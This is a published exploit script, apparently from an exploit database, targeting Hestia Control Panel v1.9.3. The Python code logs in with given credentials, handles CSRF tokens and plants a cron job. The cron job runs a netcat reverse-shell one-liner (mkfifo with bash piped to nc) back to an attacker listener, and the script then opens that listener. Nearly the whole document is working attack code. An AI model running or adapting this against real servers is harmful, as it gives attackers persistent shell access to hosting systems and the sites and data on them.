# Exploit Title: Hestia Control Panel Remote Code Execution
# Google # Exploit Title: Hestia Control Panel Remote Code Execution
# Google Dork: N/A
# Date: 05-03-2025
# Exploit Author: Bu?ra Enis D?nmez (n3c1)
# Vendor Homepage: https://hestiacp.com/
# Software Link: https://hestiacp.com/
# Version: v1.9.3
# Tested on: Windows

# Python POC

import requests
import argparse
import subprocess
import urllib3
import re

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def login(url, username, password):
session = requests.Session()

token_response = session.get(f"{url}/login/", verify=False)
match = re.search(r'<input type="hidden" name="token" value="(.*?)">',
token_response.text)
if not match:
print("Failed to retrieve login token")
return None, None

token = match.group(1)
username_data = {"token": token, "user": username}
username_response = session.post(f"{url}/login/", data=username_data,
verify=False)

match = re.search(r'<input type="hidden" name="token" value="(.*?)">',
username_response.text)
if not match:
print("Failed to retrieve password token")
return None, None

token = match.group(1)
password_data = {"token": token, "password": password}
password_response = session.post(f"{url}/login/", data=password_data,
verify=False)

if "login" in password_response.url:
print("Login failed!")
return None, None

print("Login successful!")
return session, session.cookies.get("PHPSESSID"), token

def create_cron(url, session, phpsessid, listener_ip, listener_port, token):
cron_payload = (
f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc
{listener_ip} {listener_port} >/tmp/f"
)

cron_data = {
"token": token,
"ok": "Add",
"v_cmd": cron_payload,
"v_min": "*",
"v_hour": "*",
"v_day": "*",
"v_month": "*",
"v_wday": "*",
}

headers = {
"Referer": f"{url}/add/cron/",
"Origin": url,
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:110.0)
Gecko/20100101 Firefox/110.0",
"X-Requested-With": "XMLHttpRequest"
}

cron_response = session.post(f"{url}/add/cron/", data=cron_data,
cookies={"PHPSESSID": phpsessid}, headers=headers, verify=False)
if "cron" in cron_response.url:
print("Cronjob successfully generated!")
return True

print("Failed to create cronjob.")
return False

def open_listener(ip, port):
print("Opening listener...")
try:
subprocess.run(["nc", "-vv", "-l", "-p", str(port), "-n"],
check=True)
except subprocess.CalledProcessError as e:
print("Error starting listener:", e)
except Exception as e:
print("Unexpected error:", e)

if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Exploit script for
creating cronjobs.")
parser.add_argument("-url", required=True, help="Target URL with port
(e.g., https://example.com:8083)")
parser.add_argument("-u", required=True, help="Username")
parser.add_argument("-p", required=True, help="Password")
parser.add_argument("-ip", required=True, help="Listener IP")
parser.add_argument("-port", required=True, type=int, help="Listener
Port")
args = parser.parse_args()

session, phpsessid, token = login(args.url, args.u, args.p)
if session and phpsessid:
if create_cron(args.url, session, phpsessid, args.ip, args.port,
token):
open_listener(args.ip, args.port)